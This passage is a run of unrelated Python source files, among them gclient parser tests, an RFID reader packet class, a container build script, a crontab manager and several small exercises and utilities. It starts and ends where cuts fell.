' "baz": "\\"{foo}\\" == \\"bar\\"",',
'}',
'deps = {',
' "src/baz": {',
' "url": "baz_url",',
' "condition": "baz",',
' },',
'}',
])
local_scope = gclient_eval.Parse(deps_file, '<unknown>', None)
self.assertEqual({
'vars': {'foo': 'bar',
'baz': '"bar" == "bar"'},
'deps': {'src/baz': {'url': 'baz_url',
'dep_type': 'git',
'condition': 'baz'}},
}, local_scope)
def test_has_builtin_vars(self):
builtin_vars = {'builtin_var': 'foo'}
deps_file = '\n'.join([
'deps = {',
' "a_dep": "a{builtin_var}b",',
'}',
])
local_scope = gclient_eval.Parse(deps_file, '<unknown>', None, builtin_vars)
self.assertEqual({
'deps': {'a_dep': {'url': 'afoob',
'dep_type': 'git'}},
}, local_scope)
def test_declaring_builtin_var_has_no_effect(self):
builtin_vars = {'builtin_var': 'foo'}
deps_file = '\n'.join([
'vars = {',
' "builtin_var": "bar",',
'}',
'deps = {',
' "a_dep": "a{builtin_var}b",',
'}',
])
local_scope = gclient_eval.Parse(deps_file, '<unknown>', None, builtin_vars)
self.assertEqual({
'vars': {'builtin_var': 'bar'},
'deps': {'a_dep': {'url': 'afoob',
'dep_type': 'git'}},
}, local_scope)
def test_override_builtin_var(self):
builtin_vars = {'builtin_var': 'foo'}
vars_override = {'builtin_var': 'override'}
deps_file = '\n'.join([
'deps = {',
' "a_dep": "a{builtin_var}b",',
'}',
])
local_scope = gclient_eval.Parse(
deps_file, '<unknown>', vars_override, builtin_vars)
self.assertEqual({
'deps': {'a_dep': {'url': 'aoverrideb',
'dep_type': 'git'}},
}, local_scope, str(local_scope))
def test_expands_vars(self):
local_scope = self.callParse()
self.assertEqual({
'vars': {'foo': 'bar'},
'deps': {'a_dep': {'url': 'abarb',
'dep_type': 'git'}},
}, local_scope)
def test_overrides_vars(self):
local_scope = self.callParse(vars_override={'foo': 'baz'})
self.assertEqual({
'vars': {'foo': 'bar'},
'deps': {'a_dep': {'url': 'abazb',
'dep_type': 'git'}},
}, local_scope)
def test_no_extra_vars(self):
deps_file = '\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{baz}b",',
'}',
])
with self.assertRaises(KeyError) as cm:
gclient_eval.Parse(deps_file, '<unknown>', {'baz': 'lalala'})
self.assertIn('baz was used as a variable, but was not declared',
str(cm.exception))
def test_standardizes_deps_string_dep(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": "a_url@a_rev",',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git'}},
}, local_scope)
def test_standardizes_deps_dict_dep(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": {',
' "url": "a_url@a_rev",',
' "condition": "checkout_android",',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git',
'condition': 'checkout_android'}},
}, local_scope)
def test_ignores_none_in_deps_os(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": "a_url@a_rev",',
'}',
'deps_os = {',
' "mac": {',
' "a_dep": None,',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git'}},
}, local_scope)
def test_merges_deps_os_extra_dep(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": "a_url@a_rev",',
'}',
'deps_os = {',
' "mac": {',
' "b_dep": "b_url@b_rev"',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git'},
'b_dep': {'url': 'b_url@b_rev',
'dep_type': 'git',
'condition': 'checkout_mac'}},
}, local_scope)
def test_merges_deps_os_existing_dep_with_no_condition(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": "a_url@a_rev",',
'}',
'deps_os = {',
' "mac": {',
' "a_dep": "a_url@a_rev"',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git'}},
}, local_scope)
def test_merges_deps_os_existing_dep_with_condition(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": {',
' "url": "a_url@a_rev",',
' "condition": "some_condition",',
' },',
'}',
'deps_os = {',
' "mac": {',
' "a_dep": "a_url@a_rev"',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {
'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git',
'condition': '(checkout_mac) or (some_condition)'},
},
}, local_scope)
def test_merges_deps_os_multiple_os(self):
local_scope = gclient_eval.Parse('\n'.join([
'deps_os = {',
' "win": {'
' "a_dep": "a_url@a_rev"',
' },',
' "mac": {',
' "a_dep": "a_url@a_rev"',
' },',
'}',
]), '<unknown>')
self.assertEqual({
'deps': {
'a_dep': {'url': 'a_url@a_rev',
'dep_type': 'git',
'condition': '(checkout_mac) or (checkout_win)'},
},
}, local_scope)
def test_fails_to_merge_same_dep_with_different_revisions(self):
with self.assertRaises(gclient_eval.gclient_utils.Error) as cm:
gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": {',
' "url": "a_url@a_rev",',
' "condition": "some_condition",',
' },',
'}',
'deps_os = {',
' "mac": {',
' "a_dep": "a_url@b_rev"',
' },',
'}',
]), '<unknown>')
self.assertIn('conflicts with existing deps', str(cm.exception))
def test_merges_hooks_os(self):
local_scope = gclient_eval.Parse('\n'.join([
'hooks = [',
' {',
' "action": ["a", "action"],',
' },',
']',
'hooks_os = {',
' "mac": [',
' {',
' "action": ["b", "action"]',
' },',
' ]',
'}',
]), '<unknown>')
self.assertEqual({
"hooks": [{"action": ["a", "action"]},
{"action": ["b", "action"], "condition": "checkout_mac"}],
}, local_scope)
if __name__ == '__main__':
level = logging.DEBUG if '-v' in sys.argv else logging.FATAL
logging.basicConfig(
level=level,
format='%(asctime).19s %(levelname)s %(filename)s:'
'%(lineno)s %(message)s')
unittest.main()
|
# Write a program called alice_words.py that creates a text file named alice_words.txt
# containing an alphabetical listing of all the words,
# and the number of times each occurs, in the text version of Alice’s Adventures in Wonderland.
# The first 10 lines of your output file should look something like this:
#
# Word Count
# =======================
# a 631
# a-piece 1
# abide 1
# able 1
# about 94
# above 3
# absence 1
# absurd 2
import re
def alice_words(alice):
wordtally = {}
alicehandle = open(alice, "r")
lines = alicehandle.readlines()
alicehandle.close()
words = re.findall("[a-zA-Z]+", " ".join(lines)) # easiest way to get rid of \n etc in txt
for word in words:
word = word.lower() # finally a string, so a chance to lowercase it
wordtally[word] = wordtally.get(word, 0) + 1
wordlist = list(wordtally.items())
wordlist.sort()
alicefile = open("alice_words.txt", "w")
alicefile.write("\n")
alicefile.write("Word")
alicefile.write(" ")
alicefile.write("Count\n")
alicefile.write("=======================\n")
for i in wordlist:
alicefile.write(i[0])
alicefile.write(str(i[1]).rjust((23-len(i[0])))) # 23 characters until end of 'Count', so right align to there
alicefile.write("\n")
alicefile.close()
alice_words("C:\\Users\Matthijs\Programming\ThinkPython\src\Twentieth Chapter\\alice_in_wonderland.txt")
# NB: English syntax poses a problem here: omitting ' in the RE FindAll method means "Alice's" is treated as
# one instance of the word "Alice" and one instance of the word "s". It also leads to pseudowords like "doesn".
# Conversely, including the ' leads to the appearance of many words that open a sequence in quote marks in the text,
# e.g. " 'besides ". The latter seems more distorting than the former, so I have omitted the (possessive) apostrophe.
|
# -*- coding: utf-8 -*-
# -------
# Class that represents a packet to communicate with a IND903 device
# author: espinr
# -------
#===============================================================================
#
# Definition of data packets with commands to IND903
# [ Head | Len | Address | Cmd | Data[0…N] | Check ]
# | | | | | |
# | | | | | |> (1 Byte) Checksum. Check all the bytes except itself.
# | | | | |> (n Bytes) Command parameters
# | | | |> (1 Byte) Command byte (list of commands)
# | | |> (1 Byte) Reader’s address. The common addresses are 0~ 254(0xFE),
# | | 255(0xFF) is the public address.
# | | The reader accepts the address of itself and the public address.
# | |> (1 Byte) Length of the packet bytes. Starts from the third byte.
# |> (1 Byte) Head of the packet. (Always 0xA0)
#
# Definition of response data packets
# [ Head | Len | Address | Data[0…N] | Check ]
# | | | | |
# | | | | |> (1 Byte) Checksum. Check all the bytes except itself.
# | | | |> (n Bytes) Data from the reader
# | | |> (1 Byte) Reader’s address.
# | |> (1 Byte) Length of the packet bytes. Starts from the third byte.
# |> (1 Byte) Head of the packet. (Always 0xA0)
#===============================================================================
import binascii
class Ind903PacketException(Exception):
pass
class Ind903Packet(object):
# Definition of commands and packets
PACKET_HEAD = 0xA0; # All packets start with 0xA0
# Component index in the array of bytes
INDEX_HEAD = 0;
INDEX_LENGTH = 1;
INDEX_ADDRESS = 2;
INDEX_CMD = 3;
INDEX_DATA_START= 4;
# Commands already implemented
CMD_GET_FIRMWARE_VERSION = b"\x72"
CMD_NAME_REAL_TIME_INVENTORY = b"\x89"
CMD_SET_WORKING_ANTENNA = b"\x74"
# Packets predefined
#PACKET_GET_FIRMWARE_VERSION = b"\xA0\x03\x01\x72\xEA"
#PACKET_NAME_REAL_TIME_INVENTORY = b"\xA0\x04\x01\x89\x01\xD1"
#PACKET_SET_WORKING_ANTENNA = b"\xA0\x04\x01\x74\x00\xE7"
ERRORCODE_COMMAND_SUCCESS = b'\x10'
def __init__(self, head, length, address, cmd, data, check):
"""
Create a packet with the data specified
:param head: (bytes) head of the packet
:param length: (bytes) length of the packet
:param address: (bytes) address of the reader
:param cmd: (bytes) cmd of the packet
:param data: (bytes) data bytes in the packet [0..n]
:param check: (bytes) checksum of the packet
"""
self.head = head
self.length = length
self.address = address
self.cmd = cmd
self.data = bytearray() if (data == None) else data
self.check = check
self.packet = bytearray(self.head+self.length+self.address+self.cmd+self.data+self.check)
def parsePacket(packetData):
"""
Static method to parse and extract the packet information into the structure
:param packetData: hexadecimal bytes corresponding to the packet
"""
try:
packet = bytearray(packetData)
head = packet[Ind903Packet.INDEX_HEAD].to_bytes(1, byteorder='big', signed=False)
length = packet[Ind903Packet.INDEX_LENGTH].to_bytes(1, byteorder='big', signed=False)
address = packet[Ind903Packet.INDEX_ADDRESS].to_bytes(1, byteorder='big', signed=False)
cmd = packet[Ind903Packet.INDEX_CMD].to_bytes(1, byteorder='big', signed=False)
data = bytearray(packet[Ind903Packet.INDEX_DATA_START:len(packet)-1])
check = packet[len(packet)-1].to_bytes(1, byteorder='big', signed=False)
return Ind903Packet(head, length, address, cmd, data, check)
except:
raise Ind903PacketException('Error parsing the packet ' + packetData)
parsePacket = staticmethod(parsePacket)
def toString(self):
"""
:return: The complete packet as a list of bytes in a string
"""
printable = '[ '
printable += binascii.hexlify(self.head).decode() + ' | '
printable += binascii.hexlify(self.length).decode() + ' | '
printable += binascii.hexlify(self.address).decode() + ' | '
printable += binascii.hexlify(self.cmd).decode() + ' | '
for b in self.data:
printable += format(b, '02X') + ' '
printable += '| ' + binascii.hexlify(self.check).decode() + ' ]'
return printable.upper()
def getChecksumPacket(packetToCheck):
"""
Static method that calculates the checksum of the list of bytes. The checksum will be generated using this function
unsigned char CheckSum(unsigned char *uBuff, unsigned char uBuffLen){
unsigned char i,uSum=0;
for(i=0;i<uBuffLen;i++){
uSum = uSum + uBuff[i];
}
uSum = (~uSum) + 1;return uSum;
}
:param packetToCheck: list of bytes, to check
:return: (byte) the checksum of the packet as hex
"""
intSum = 0
for x in packetToCheck:
intSum = intSum + x
if (intSum > 255):
intSum = intSum.to_bytes(2, byteorder='big', signed=False)[1]
intSum = (~intSum) + 1;
if (intSum > 255):
intSum = intSum.to_bytes(2, byteorder='big', signed=False)[1]
# To avoid the sign
return intSum.to_bytes(1, byteorder='big', signed=True)
getChecksumPacket = staticmethod(getChecksumPacket)
def isEndRealTimeInventory(self):
"""
Check if the current packet indicates the end of an inventory. It is expected to be a response of CMD_NAME_REAL_TIME_INVENTORY command from the reader.
If the reader finished reading tags, it may send two types of responses:
Success:
Head Len Address Cmd Ant_ID Total_Read Check
0xA0 0x08 X 0x89 Y 4 bytes Z
(Total read is the number of tags read during the inventory round)
Error:
Head Len Address Cmd Error_Code Check
0xA0 0x04 X 0x89 Y Z
:return: (byte) with the error code of the result 0x10 for command_success
"""
if (self.cmd != self.CMD_NAME_REAL_TIME_INVENTORY):
raise Ind903PacketException('Received command is ' + self.cmd + ', not a ' + self.CMD_NAME_REAL_TIME_INVENTORY)
if (self.length == b'\x08' and len(self.data) == 5):
return self.ERRORCODE_COMMAND_SUCCESS
# In other case, an error was found, raise an exception
elif (self.length == b'\x04' and len(self.data) == 1):
return self.data[0]
return b'\x00'
def isCommand(self, cmd):
"""
Check if the current packet is the command sent as parameter
:param cmd: (byte) with the command to compare
"""
return (self.cmd == cmd)
def getTagEPCFromInventoryData(self):
"""
Extracts the information corresponding to the EPC in the data stored. It's a packet corresponding to
the response of a command x89. Data is structured as:
Freq_Ant (1 byte): The high 6 bits are frequency parameter; the low 2 bits are antenna ID.)
PC (2 bytes): Tag’s PC.
EPC (>=12 bytes) Tag’s EPC.
RSSI (1 byte): The RSSI (-dBm) when tag is identified.
"""
if (not self.isCommand(self.CMD_NAME_REAL_TIME_INVENTORY)):
raise Ind903PacketException('Reading tag EPC from a packet with a unknown command '+self.toString())
if (len(self.data)<5):
raise Ind903PacketException('Reading tag EPC from a too short packet '+self.toString())
return self.data[3:len(self.data)-1];
def generatePacketSetAntenna(addressAntenna=b'\x00'):
"""
Static method to generate a packet to set the antenna (by default, \x00 -> antenna 01).
:param addressAntenna: hexadecimal byte corresponding to the id of the antenna (00 by default)
"""
subpacket = bytearray(b'\xA0\x04\x01\x74' + addressAntenna)
return Ind903Packet.parsePacket(bytearray(subpacket + Ind903Packet.getChecksumPacket(subpacket)))
generatePacketSetAntenna = staticmethod(generatePacketSetAntenna)
def generatePacketStartRealTimeInventory(channel=b'\x01'):
"""
Static method to generate a packet to start an inventory round. In data, there is the channel
(How many RF carrier frequency hopping channels are going to be used per inventory round)
:param channel: hexadecimal byte corresponding to the channel (01 by default)
"""
subpacket = bytearray(b"\xA0\x04\x01\x89" + channel)
return Ind903Packet.parsePacket(bytearray(subpacket + Ind903Packet.getChecksumPacket(subpacket)))
generatePacketStartRealTimeInventory = staticmethod(generatePacketStartRealTimeInventory)
|
import numpy as np
import scipy.sparse
def assert_finite(X):
"""Assert numpy or scipy matrix is finite."""
X = X.data if scipy.sparse.issparse(X) else X
assert np.all(np.isfinite(X))
return True
def assert_array_equal(X, Y):
"""Assert two arrays to be equal, whether sparse or dense."""
assert X.shape == Y.shape
if scipy.sparse.issparse(X) and scipy.sparse.issparse(Y):
X = X.tocsr()
Y = Y.tocsr()
np.testing.assert_array_equal(X.data, Y.data)
np.testing.assert_array_equal(X.indices, Y.indices)
np.testing.assert_array_equal(X.indptr, Y.indptr)
else:
X = np.asarray(X)
Y = np.asarray(Y)
np.testing.assert_array_equal(X, Y)
|
from . import LC_Net_v3
from . import LC_Net_v2
from . import LC_Net
from . import RAZ_loc
|
#!/usr/bin/env python
"""
Service build script.
"""
from nspawn.build import *
# load shared config
import os
import runpy
this_dir = os.path.dirname(os.path.abspath(__file__))
arkon = runpy.run_path(f"{this_dir}/arkon.py")
image_url = arkon['image_url']
alpine_url = arkon['alpine_url']
service_config = arkon['service_config']
machine_name = service_config['machine_name']
service_log_dir = service_config['service_log_dir']
service_store_dir = service_config['service_store_dir']
#
# perfrom build
#
IMAGE(image_url)
PULL(alpine_url)
WITH(
Boot='yes',
KillSignal="SIGUSR1",
)
# nginx storage folder
WITH(Bind=service_store_dir + '/')
# system logging
WITH(Bind=f"{service_log_dir}:/var/log/")
# default config
COPY("/etc")
COPY("/root")
# configure host name
CAST("/etc/hostname",
machine_name=machine_name,
)
# configure amazon file sync
CAST("/etc/file_sync_s3/arkon.ini",
service_config=service_config,
)
# basic system setup
SH("apk update")
SH("apk upgrade")
SH("apk add tzdata")
SH("apk add ca-certificates")
SH("apk add busybox-initscripts")
SH("apk add mc htop pwgen")
SH("apk add syslog-ng logrotate")
SH("apk add dhcpcd openssh")
# provide amazon file sync
SH("apk add inotify-tools")
SH("apk add python3 py3-pip")
SH("pip3 install file_sync_s3")
SH("file_sync_s3_install")
# ensure system services
SH("rc-update add syslog-ng")
SH("rc-update add dhcpcd")
SH("rc-update add crond")
SH("rc-update add sshd")
# container ssh access
SH("""
echo 'PubkeyAuthentication yes' >> /etc/ssh/sshd_config
echo 'PasswordAuthentication no' >> /etc/ssh/sshd_config
user=root; pass=$(pwgen -s 64 1); echo $user:$pass | chpasswd
""")
PUSH()
|
#!/bin/env python
"""
Setuptools file for pyyamlconfig
"""
from setuptools import (
setup,
find_packages,
)
setup(
name='pyyamlconfig',
author='marhag87',
author_email='marhag87@gmail.com',
url='https://github.com/marhag87/pyyamlconfig',
version='0.2.4',
packages=find_packages(),
license='WTFPL',
description='Load configuration file in yaml format',
long_description='Load configuration file in yaml formaẗ́',
install_requires=['PyYAML'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Programming Language :: Python :: 3',
],
test_suite='nose.collector',
tests_require=['nose'],
)
|
class Solution(object):
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
N = len(nums)
p0, p2 = 0, N - 1
i = 0
while not (i > p2 or p0 > N - 1 or p2 < 0):
if nums[i] == 1:
i += 1
elif nums[i] == 0:
if i == p0:
i += 1
p0 += 1
else:
if nums[i] != nums[p0]: # do not change the equal value
nums[i], nums[p0] = nums[p0], nums[i]
p0 += 1
elif nums[i] == 2:
if nums[i] != nums[p2]: # do not change the equal value
nums[i], nums[p2] = nums[p2], nums[i]
p2 -= 1
|
#!/usr/bin/python3
import cgi
import json
import psycopg2
from datetime import datetime, timedelta
try:
date_object = datetime.today()
date_string = date_object.strftime("%Y-%m-%d")
arguments = cgi.FieldStorage()
uuid = arguments.getvalue("id")
liter = arguments.getvalue("liter")
comment = arguments.getvalue("comment")
conn = psycopg2.connect("host=yourHost dbname=yourDB user=yourUser password=yourPassword")
cur = conn.cursor()
cur.execute("UPDATE trees SET watered_at = %s, watered = %s,comment = %s WHERE tree_id = %s", (date_string, liter, comment ,uuid))
conn.commit()
cur.close()
conn.close()
print ("Content-type: application/json")
print ()
print ('{"request" : "done"}')
except Exception as error:
print ("Content-type: application/json")
print ()
print ('{"request" : "error"}')
|
"""
Faça um programa que tenha uma função chamada escreva(),
que receba um texto qualquer com parametros e mostre uma
mensagem som tamanho adaptável.
Ex:
escreva('Olá, Mundo!")
Saída
------------
Olá, Mundo
------------
"""
def escreva(msg):
tam = len(msg)+4
print('~' *tam)
print(f' {msg}')
print('~'* tam)
escreva('Everton Dutra')
escreva('Eduardo')
escreva('Anne')
escreva('Graziele')
|
#!/usr/local/bin/python
from rasa.nlu.convert import convert_training_data
from subprocess import call, run
import os
cmd = ['npx chatito --format rasa data/']
p = call(cmd, shell=True, cwd=os.path.dirname(__file__))
convert_training_data(data_file="rasa_dataset_training.json", out_file="nlu.md", output_format="md", language="")
|
#!/usr/bin/env python3
"""Unit-tested functions for cronctl"""
from collections import namedtuple
import subprocess
import re
import logging
import shlex
from pathlib import Path
import difflib
ROBOT_DEF_REGEX = re.compile(r'^(#|//)(?P<type>[A-Z]*):cron:(?P<def>.*)$', re.MULTILINE)
CRON_DEF_REGEX = re.compile(r"""
^(
[#].* # comment
|\S+=.* # var assign
|(?P<time1>@\S+)\s+(?P<cmd1>\S.*) # time spec shortcut ie @reboot
|(?P<time2>([-0-9/*,]+\s+){5})(?P<cmd2>\S.*) # common format
|\s* # empty line
)$
""", re.VERBOSE)
TYPE_CHARS_DESCRIPTION = {
'P': 'production',
'D': 'devel',
'T': 'test',
'S': 'support',
'I': 'internal',
'R': 'robots'
}
TYPE_CHARS_ORDER = 'PRTDSI'
RobotDef = namedtuple('RobotDef', ('fullname', 'cron_def', 'type_chars'))
CronLine = namedtuple('CronLine', ('robot_def', 'text'))
def list_paths(paths):
"""List all robots sorted by type"""
abs_paths = to_abs_paths(paths)
robots = get_all_robots(abs_paths)
present_types = sort_robots(get_present_types(robots))
list_robots(robots, present_types)
def sort_robots(robot_types):
"""Sort robot type chars by TYPE_CHARS_ORDER"""
return sorted(robot_types, key=get_sort_robots_weight)
def get_sort_robots_weight(robot_type):
"""Calculate robot type weight for sorting"""
weight = TYPE_CHARS_ORDER.find(robot_type)
return weight if weight > -1 else len(TYPE_CHARS_ORDER)
def list_robots(robots, present_types):
"""Print given robots grouped by types"""
for type_char in present_types:
print('Jobs for environment {type_char} ({type_description}):'.format(
type_char=type_char,
type_description=TYPE_CHARS_DESCRIPTION.get(type_char, '')
))
for robot in sorted(filter_robots_by_type(robots, type_char)):
print(' {r.fullname:<90} {r.cron_def:<25} {r.type_chars}'.format(r=robot))
print()
return True
def add_paths(paths, type_char, force):
"""Check paths for new robots and update user's crontab"""
abs_paths = to_abs_paths(paths)
robots = filter_robots_by_type(get_all_robots(abs_paths), type_char)
old_crontab = get_crontab_list()
crontab = parse_crontab_list(old_crontab)
new_crontab = update_cron_by_robots(crontab, robots, abs_paths)
return save_changes(old_crontab, new_crontab, force)
def remove_paths(paths, force):
"""Remove all crontab lines containing given paths"""
abs_paths = to_abs_paths(paths)
old_crontab = get_crontab_list()
new_crontab = remove_paths_from_cron(old_crontab, abs_paths)
return save_changes(old_crontab, new_crontab, force)
def save_changes(old_crontab, new_crontab, force):
"""If any diff, show them and save to file"""
if old_crontab == new_crontab:
print('No crontab changes.')
else:
print_diff(old_crontab, new_crontab)
if force or confirm_write():
if write_new_crontab(new_crontab):
print('New crontab successfully written.')
else:
print('An error occurred while writing new crontab.')
return False
return True
def to_abs_paths(paths):
"""Convert list of paths to absolute"""
return [Path(path).resolve() for path in paths]
def update_cron_by_robots(crontab, robots, paths):
"""Update list of CronLine by list of RobotDef"""
output_cron = []
robots_set = {
RobotDef(robot.fullname, robot.cron_def, '')
for robot in robots
}
cron_robots = {
RobotDef(cron.robot_def.fullname, cron.robot_def.cron_def, '')
for cron in crontab
}
paths_parts = [path.parts for path in paths]
output_cron = [
cron.text
for cron in crontab
if cron.robot_def in robots_set or not_in_paths(cron.robot_def.fullname, paths_parts)
] + sorted([
robot.cron_def + ' ' + robot.fullname
for robot in robots_set if robot not in cron_robots
])
return output_cron
def not_in_paths(fullname, paths_parts):
"""Check if file is in any of paths or subdir"""
fullname_parts = Path(fullname).parts
for path in paths_parts:
if fullname_parts[:len(path)] == path:
return False
return True
def confirm_write():
"""Asks the user if agrees to write changes"""
print()
answer = ''
while answer not in ('a', 'y', 'j', 'n'):
answer = input('Really write changes (y/n)? ').lower().strip()
return answer != 'n'
def print_diff(old_crontab, new_crontab):
"""Print diff between lists"""
print('The required crontab changes are:')
diff = difflib.Differ().compare(old_crontab, new_crontab)
print('\n'.join(diff))
def remove_paths_from_cron(crontab_list, paths):
"""Remove all crontab lines containing given paths"""
parsed_cron = parse_crontab_list(crontab_list)
paths_parts = [path.parts for path in paths]
output_cron = [
line.text
for line in parsed_cron
if not_in_paths(line.robot_def.fullname, paths_parts)
]
return output_cron
def parse_crontab_list(crontab_list):
"""Parse crontab content line by line"""
cron_lines = []
for line in crontab_list:
m_line = CRON_DEF_REGEX.match(line)
if m_line:
command = (m_line.group('cmd1') or m_line.group('cmd2') or '').strip()
if command:
command = shlex.split(command)[0]
robot_def = RobotDef(
command,
(m_line.group('time1') or m_line.group('time2') or '').strip(),
''
)
else:
logging.error('Unknown cron line format: "%s"', line)
robot_def = RobotDef('', '', '')
cron_lines.append(CronLine(robot_def, line))
return cron_lines
def get_crontab_list(cmd=('crontab', '-l')):
"""Get list of current user's crontab definitions"""
result = subprocess.run(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True,
check=False
)
return result.stdout.rstrip().split('\n')
def write_new_crontab(records, cmd=('crontab', '-')):
"""Overwrite user's crontab with given records"""
cron_text = '\n'.join(records).rstrip() + '\n'
result = subprocess.run(
cmd,
input=cron_text,
universal_newlines=True,
check=False
)
return result.returncode == 0
def get_all_robots(paths):
"""Get all robots def from all paths"""
defs = []
for path in paths:
if path.is_dir():
for fullname in path.iterdir():
if fullname.is_file():
defs += get_robot_defs_from_file(fullname)
elif path.is_file():
defs += get_robot_defs_from_file(path)
return set(defs)
def get_robot_defs_from_file(fullname):
"""Get robot defs by filename"""
with fullname.open() as fin:
return get_robot_defs(fullname, fin.read())
def get_robot_defs(fullname, source):
"""Scan given source for cron definitions with type"""
return [RobotDef(str(fullname), match.group('def').strip(), match.group('type'))
for match in ROBOT_DEF_REGEX.finditer(source)]
def filter_robots_by_type(robots, type_char):
"""Filter robot defs by type char"""
return (robot for robot in robots if type_char in robot.type_chars)
def get_present_types(robots):
"""Get unique set of types present in given list"""
return {type_char for robot in robots for type_char in robot.type_chars}
|
"""Crossover implementations for continuous solutions kind
"""
# main imports
import random
import sys
import numpy as np
# module imports
from macop.operators.base import Crossover
class BasicDifferentialEvolutionCrossover(Crossover):
"""Basic Differential Evolution implementation for continuous solution
Attributes:
kind: {:class:`~macop.operators.base.KindOperator`} -- specify the kind of operator
Example:
>>> # import of solution and polynomial mutation operator
>>> from macop.solutions.continuous import ContinuousSolution
>>> from macop.operators.continuous.crossovers import BasicDifferentialEvolutionCrossover
>>> solution = ContinuousSolution.random(5, (-2, 2))
>>> list(solution.data)
[-1.3760219186551894, -1.7676655513272022, 1.4647045830997407, 0.4044600469728352, 0.832290311184182]
>>> crossover = BasicDifferentialEvolutionCrossover(interval=(-2, 2))
>>> crossover_solution = crossover.apply(solution)
>>> list(crossover_solution.data)
[-1.7016619497704522, -0.43633033292228895, 2.0, -0.034751768954844, 0.6134819652022994]
"""
def __init__(self, interval, CR=1.0, F=0.5):
""""Basic Differential Evolution crossover initialiser in order to specify kind of Operator and interval of continuous solution
Args:
interval: {(float, float)} -- minimum and maximum values interval of variables in the solution
CR: {float} -- probability to use of new generated solutions when modifying a value of current solution
F: {float} -- degree of impact of the new generated solutions on the current solution when obtaining new solution
"""
super().__init__()
self.mini, self.maxi = interval
self.CR = CR
self.F = F
def apply(self, solution1, solution2=None):
"""Create new solution based on solution passed as parameter
Args:
solution1: {:class:`~macop.solutions.base.Solution`} -- the first solution to use for generating new solution
solution2: {:class:`~macop.solutions.base.Solution`} -- the second solution to use for generating new solution
Returns:
{:class:`~macop.solutions.base.Solution`}: new continuous generated solution
"""
size = solution1.size
solution1 = solution1.clone()
# create two new random solutions using instance and its static method
solution2 = solution1.random(size, interval=(self.mini, self.maxi))
solution3 = solution1.random(size, interval=(self.mini, self.maxi))
# apply crossover on the new computed solution
for i in range(len(solution1.data)):
# use of CR to change or not the current value of the solution using new solutions
if random.uniform(0, 1) < self.CR:
solution1.data[i] = solution1.data[i] + self.F * (solution2.data[i] - solution3.data[i])
# repair solution if necessary
solution1.data = self._repair(solution1)
return solution1
def _repair(self, solution):
"""
Private repair function for solutions if an element is out of bounds of an expected interval
Args:
solution: {:class:`~macop.solutions.base.Solution`} -- the solution to use for generating new solution
Returns:
{ndarray} -- repaired array of float values
"""
return np.array([self.mini if x < self.mini else self.maxi if x > self.maxi else x for x in solution.data])
|
import tensorflow as tf
from tensorflow.python.framework import ops
import sys
import os
BASE_DIR = os.path.dirname(__file__)
sys.path.append(BASE_DIR)
# load custom tf interpolate lib
try:
if os.path.exists(os.path.join(BASE_DIR, 'tf_interpolate_so.so')):
interpolate_module=tf.load_op_library(os.path.join(BASE_DIR, 'tf_interpolate_so.so'))
else:
raise NotImplementedError("Your TensorFlow has suffered a problem")
except:
print(f'Attention! your tensorflow version should below 1.14! yours is {tf.__version__}\n')
print('can not load tf_interpolate_so custom ops correctly! Check your tensorflow version!')
def three_nn(xyz_query, xyz_support):
'''find xyz_query's nearest 3 neighbors of xyz_support
Input:
xyz_query: (b,n,3) float32 array, unknown/query points
xyz_support: (b,m,3) float32 array, known/support points
Output:
dist: (b,n,3) float32 array, distances to known points
idx: (b,n,3) int32 array, indices to known points
'''
return interpolate_module.three_nn(xyz_query, xyz_support)
ops.NoGradient('ThreeNN')
def three_interpolate(features_support, query_idx_over_support, weight):
'''interpolate features for the xyz_query(determined by idx)
Input:
features_support: (b,m,c) float32 array, known/support features of the corresponding xyz_support
query_idx_over_support: (b,n,3) int32 array, indices of nearest 3 neighbors in the known/support points for each query point
weight: (b,n,3) float32 array, weights for query_idx_over_support
Output:
out: (b,n,c) float32 array, interpolated point features
'''
return interpolate_module.three_interpolate(features_support, query_idx_over_support, weight)
@tf.RegisterGradient('ThreeInterpolate')
def _three_interpolate_grad(op, grad_out):
points = op.inputs[0]
idx = op.inputs[1]
weight = op.inputs[2]
return [interpolate_module.three_interpolate_grad(points, idx, weight, grad_out), None, None]
if __name__=='__main__':
import numpy as np
import time
np.random.seed(100)
features = np.random.random((32,128,64)).astype('float32')
xyz1 = np.random.random((32,512,3)).astype('float32')
xyz2 = np.random.random((32,128,3)).astype('float32')
with tf.device('/cpu:0'):
points = tf.constant(features)
xyz1 = tf.constant(xyz1)
xyz2 = tf.constant(xyz2)
dist, idx = three_nn(xyz1, xyz2)
weight = tf.ones_like(dist)/3.0
interpolated_points = three_interpolate(points, idx, weight)
with tf.Session('') as sess:
now = time.time()
for _ in range(100):
ret = sess.run(interpolated_points)
print(time.time() - now)
print(ret.shape, ret.dtype)
|
from .exception import AuthException
from application.models import User
import typing
from flask_login import login_user
class LoginException(AuthException):
pass
def login(data: dict) -> typing.NoReturn:
user_id = data.get('user_id')
password = data.get('password')
remember = True if data.get('remember') else False
if not user_id or not password:
raise LoginException('空欄があります')
user = User.query.filter_by(user_id=user_id).first()
is_no_user = user is None
if is_no_user:
raise LoginException('ユーザーが存在しません')
